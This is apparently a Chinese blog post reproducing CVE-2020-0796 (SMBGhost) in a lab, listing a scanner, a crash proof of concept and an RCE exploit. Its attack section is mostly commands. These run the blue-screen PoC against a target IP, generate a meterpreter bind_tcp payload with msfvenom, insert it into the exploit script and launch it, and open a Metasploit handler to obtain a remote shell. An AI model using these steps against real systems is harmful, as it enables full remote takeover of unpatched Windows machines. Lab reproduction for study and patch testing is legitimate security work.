【漏洞复现】CVE-2020-0796 SMBv3远程代码执行

    技术2022-07-10  100

    攻击者可能利用此漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,受攻击的目标系统只需开机在线即可能被入侵。从而获取机器的完全控制,利用端口445

    影响版本: 漏洞主要影响Windows10版本(1903和1909),包括32位、64位的家用版、专业版、企业版、教育版

    资源

    检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip 蓝屏EXP:https://github.com/eerykitty/CVE-2020-0796-PoC RCE poc:https://github.com/chompie1337/SMBGhost_RCE_PoC 参考:https://blog.csdn.net/Eastmount/article/details/105350314 windows 10纯净版:(建议迅雷下载)

    ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/

    漏洞利用

    靶机版本:Windows 10 Version 1903 for x64-based Systems 靶机IP:192.168.1.4

    1.漏洞探测

    奇安信检测工具适用于局域网批量检测,快速查找未打补丁的机器

    http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

    2. POC 蓝屏

    https://github.com/eerykitty/CVE-2020-0796-PoC

    python CVE-2020.0796.py 192.168.1.12

    3.RCE

    https://github.com/chompie1337/SMBGhost_RCE_PoC

    ①payload生成

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o smb.py

    ②.将文件smb.py里面buf的值替换到exploit.py中 ③ 运行POC

    python3 exploit.py -ip 192.168.1.12

    ④MSF 开启监听

    use exploit/multi/handlermsf5 set payload windows/x64/meterpreter/bind_tcp set lport 1234lport => 1234 set rhost 192.168.1.12 run

    ⑤ 成功建立会话。监听端口后如果一直不弹shell,可重新运行一次 =============================================================================

    Processed: 0.015, SQL: 9